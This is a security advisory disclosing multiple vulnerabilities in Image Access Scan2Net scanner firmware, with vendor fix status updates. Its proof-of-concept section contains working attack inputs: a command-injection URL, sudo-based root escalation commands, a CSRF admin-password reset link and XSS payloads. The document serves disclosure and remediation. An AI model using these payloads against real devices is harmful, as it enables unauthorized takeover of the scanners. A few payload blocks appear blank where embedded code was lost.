SEC Consult Vulnerability Lab Security Advisory < 20241204-0 > ======================================================================= title: Multiple Critical Vulnerabilities product: Image Access Scan2Net vulnerable version: Firmware <=7.40, <=7.42, <7.42B (depending on the vulnerability) fixed version: mostly fixed in v7.42B CVE number: CVE-2024-28138, CVE-2024-28139, CVE-2024-28140 CVE-2024-28141, CVE-2024-28142, CVE-2024-28143 CVE-2024-28144, CVE-2024-28145, CVE-2024-28146 CVE-2024-47946, CVE-2024-47947, CVE-2024-36498 CVE-2024-36494, CVE-2024-50584 impact: critical vendor homepage: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en advisory URL: https://r.sec-consult.com/imageaccess found: 2023-06-22 by: Daniel Hirschberger (Office Bochum) Tobias Niemann (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Scan2Net® - The Ultimate Scanning Technology - Better than just another client software package - Integrates into existing networks without additional drivers or PCs - Unrivaled performance, highest security, low connectivity cost The Scan2Net® platform is the technological foundation of all WideTEK® and Bookeye® scanners from Image Access. It replaces the proprietary scanner drivers and software that traditional scanners require with the fastest common, nonproprietary connection available: TCP/IP over Ethernet. With network interface speeds much higher than USB or SCSI, Scan2Net devices are able to reach unrivaled performance at very low connectivity cost. The Linux based operating system is dedicated to scanner specific imaging and mechanical control tasks, further maximizing scanning speeds and performance." Source: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en Business recommendation: ------------------------ The vendor provides a firmware update to version 7.42B which should be installed immediately. SEC Consult could only partially verify the correction of all identified vulnerabilities. Some vulnerabilities have not been fixed by the vendor as the risk was accepted. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) OS Command Injection (CVE-2024-28138) An unauthenticated attacker with network access to the scanner can execute any system command via the "msg_events.php" script as the www-data user. 2) Privilege Escalation (CVE-2024-28139) The www-data user can elevate his privileges because sudo is configured to allow the execution of the mount command as root without a password. Therefore, the privileges can be escalated to the root user. 3) Violation of Least Privilege Principle (CVE-2024-28140) The scanner boots into a kiosk mode by default and opens the Scan2Net interface in a browser window. This browser is run with the permissions of the root user. There are also several other applications running as root user, some of them are self-developed ones but those could not be exploited at first glance. 4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141) The web application is not protected against cross-site request forgery attacks. Therefore, an attacker can trick users into performing actions on the application when they visit an attacker-controlled website or click on a malicious link. 5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947) Due to missing input sanitization, an attacker can perform cross-site-scripting attacks and run arbitrary Javascript in the browser of other users. 6) Insecure Password Change Function (CVE-2024-28143) The password change function does not require the current password, which makes the application vulnerable to account takeover, especially if combined with the CSRF vulnerability. 7) Broken Access Control (CVE-2024-28144) Due to missing access control on the reboot and shutdown functions, an attacker can perform a denial-of-service attack against the application. Furthermore, an attacker who can spoof the IP address and the User-Agent of a logged-in user can takeover the session because of flaws in the self-developed session management. 8) Unauthenticated SQL Injection (CVE-2024-28145) An unauthenticated attacker can perform an SQL injection by accessing the dbconnector.php file and supplying malicious GET parameters. 9) Hard-coded Credentials (CVE-2024-28146) The application uses several hard-coded credentials for protecting the firmware update file and the installed database server. Update 2024-04-02: ------------------ ImageAccess GmbH provided us with an internet-facing test device and we spent some short time verifying the vulnerabilities in their latest firmware (7.40) which should fix the security issues according to the vendor. Unfortunately, most of them are still present and new ones have been discovered. In short: 1) OS Command Injection (CVE-2024-28138, CVE-2024-47946) Fixed, but a new RCE vulnerability has been discovered which requires a session as Poweruser, updated PoC below. The second RCE issue is tracked as CVE-2024-47946. 2) Privilege Escalation (CVE-2024-28139) Still an issue. 3) Violation of Least Privilege Principle (CVE-2024-28140) Still an issue. 4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141) Fixed. The introduced "session_id" cookie is protected with the "SameSite=Strict" cookie flag. This prevents CSRF attacks. 5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498) Original issues are fixed (CVE-2024-28142, CVE-2024-47947), but we discovered a new one, updated PoC below. The new XSS is tracked as CVE-2024-36498. 6) Insecure Password Change Function (CVE-2024-28143) Fixed. The password change function now requires the current password. 7) Broken Access Control (CVE-2024-28144) Still an issue. If two users access the web interface from the same IP they are logged in as the other user. Updated PoC below. 8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584) Original issue fixed, but a new blind SQLi as Poweruser has been found, updated PoC below. The new SQLi is tracked as CVE-2024-50584. 9) Hard-coded Credentials (CVE-2024-28146) Still an issue, credentials can be found in different files. Update 2024-10-14: ------------------ ImageAccess GmbH provided us with an internet-facing test device and we spent some short time verifying the vulnerabilities in their latest firmware (7.42) which should fix the submitted critical security issues according to the vendor. 1) OS Command Injection (CVE-2024-28138, CVE-2024-47946) The new RCE vulnerability is fixed now. 2) Privilege Escalation (CVE-2024-28139) Still an open issue. The risk has been accepted by the vendor because the other critical issues are fixed and shell access is not easily possible anymore. 3) Violation of Least Privilege Principle (CVE-2024-28140) The kiosk browser is no longer running as root but many other custom services still are. 4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141) Fixed. 5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494) The third XSS (CVE-2024-36498) has also been fixed. We discovered a new XSS vulnerability in the login page which only works if the target user is _not_ already logged in, which makes it ideal for login form phishing attempts. The new XSS is tracked as CVE-2024-36494. 6) Insecure Password Change Function (CVE-2024-28143) Fixed. The password change function now requires the current password. 7) Broken Access Control (CVE-2024-28144) Still an issue. 8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584) The blind SQLi as Poweruser has been fixed. 9) Hard-coded Credentials (CVE-2024-28146) Mostly fixed. Many credentials can be found in different files. The most problematic 'support' user had their password rotated and it was not immediately obvious where it is stored now. Proof of concept: ----------------- 1) OS Command Injection (CVE-2024-28138, CVE-2024-47946) An unauthenticated attacker with network access can execute arbitrary commands by visiting the following URL. The HTTP GET parameter "data" is not properly sanitized: https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;$COMMAND For example, the following URL can be used to display information about the current user of the web server: https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;id The following image shows the output of the command: <01_os_command_injection.png> Update 2024-04-02: ------------------ The second issue is now tracked as CVE-2024-47946. The OS command injection as shown above is no longer possible in the new firmware version 7.40. Another possibility to gain remote code execution has been identified if the attacker has access to a valid Poweruser session. Specifically crafted valid PNG files with injected PHP content can be uploaded as desktop backgrounds or lock screens. After the upload, the PHP script is available in the web root. The PHP script executes once the uploaded file is accessed. This allows the execution of arbitrary PHP code and OS commands on the device as "www-data". <01_os_command_injection_new.png> 2) Privilege Escalation (CVE-2024-28139) By executing the command "sudo -l" as the www-data user, it is apparent that this user can be used to escalate privileges to root, as shown in the following figure: <02-sudo-L.png> The following commands can be executed to elevate to root privileges, as shown in the following figure: > sudo mount -o bind /usr/bin/bash /usr/bin/mount > sudo mount <02-sudo_mount.png> 3) Violation of Least Privilege Principle (CVE-2024-28140) Many processes are running with root privileges which violates the principle of Least Privilege. This can be confirmed by running "ps aux" as the root user and observing the output: root /opt/s2n/bin/S2NBrowserV7 --no-sandbox StartUpSelection.html x:0 y:800 w:1920 h:1080 root \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US root \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US [...] Apart from the browser the following binaries are also run with root permissions: vsftpd, smbd, wsdd.py, X11, OpenBox s2n-specific Binaries (copyd, s2ncopy, ocrd, imaged, camd_ucc1, admind, s2nwdd, ledd, wt36keyb, ...). 4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141) The application offers no protection against Cross-Site Request-Forgery. An attacker can therefore forge malicious links to reset the admin password or create new users. 4.1) Reset Admin Password The following link resets the password of the administrator to the value "CSRF2YOU!". The password is base64-encoded (Q1NSRjJZT1Uh). https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm 4.2) Register a new user The following code can be hosted on a malicious page controlled by the attacker. When a user who is logged in as administrator is lured by the attacker to visit this page, a new user "SECtest" with the password "CSRF2YOU!" is automatically created:
The following image shows the result: <04_register_user>.png 5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494) There are at least two identified injection points: 5.1) Scenario 1: Stored XSS via User Settings -> File Name (CVE-2024-28142) a. Login as Scan2Net User. b. Navigate to User Settings -> File Name (https://$SCANNER/cgi/uset.cgi?-cfilename) c. Edit the "Wildcard Character" %2 setting to contain the following payload and reference it in the file name: > <05-1_xss_scenario_1.png> d. The JavaScript payload will be saved automatically. e. The payload will be triggered on each visit of the User Settings -> File Name page. It is also executed when an admin visits the following page: https://$SCANNER/cgi/uset.cgi?-cfilename <05-2_xss_scenario_1_triggered.png> This attack can even be performed without being logged in because the affected functions are not fully protected. Without logging in, only the file name parameter of the "Default" User can be changed. However, the wildcards can be changed without authentication. To inject the payload, the following two requests have to be submitted. I. Changing the file name of the "Default" user to scan_xss%2.pdf: https://$SCANNER/cgi/chopt.cgi?uset+save_filename+scan_xss%252.pdf+filename+Default II. Changing the Wildcard %2 to the JavaScript payload: https://$SCANNER/cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E 5.2) Scenario 2: Stored XSS via the ScanWizard Disclaimer (CVE-2024-47947) The "Edit Disclaimer Text" function of the configuration menu is also vulnerable. Only the users Poweruser and Admin can use this function which is available at the URL https://$SCANNER/cgi/admin.cgi?-rdisclaimer+-apre The JavaScript can be inserted as shown in this image: <05-3_xss_scenario_2_insertion.png> Afterwards, this change has to be applied by clicking on the "Apply" button. From now on the payload will be executed every time the ScanWizard is loaded. The URL of the ScanWizard interface is: https://$SCANNER/ScanWizard.html <05-4_xss_scenario_2_trigger_browser.png> This also includes the ScanWizard which is displayed in the Kiosk-mode browser which is present on the physical touch-enabled display of the scanner itself. <05-4_xss_scenario_2_trigger_touch.png> Update 2024-04-02: ------------------ The third issue is now tracked as CVE-2024-36498. The following text can be inserted as Poweruser into the disclaimer to exploit this issue: %3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%53%63%72%69%70%74%3e This is the payload URL-encoded. Update 2024-10-14: ------------------ The fourth issue is now tracked as CVE-2024-36494. A new reflected XSS, which only works on unauthenticated targets, has been found: https://$SCANNER/cgi/slogin.cgi?-tsetup+-uuser%22%20onfocus%3ddocument.body.innerHTML%2B%3dlocation.hash,document.body.innerHTML%2b%3ddocument.body.innerText%20autofocus%20b%3d#